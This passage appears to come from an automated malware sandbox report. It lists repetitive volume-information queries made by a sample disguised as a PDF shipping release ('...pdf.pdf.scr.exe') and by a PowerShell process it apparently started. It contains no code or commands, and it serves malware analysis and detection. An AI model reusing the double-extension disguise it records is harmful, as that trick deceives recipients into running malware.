Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
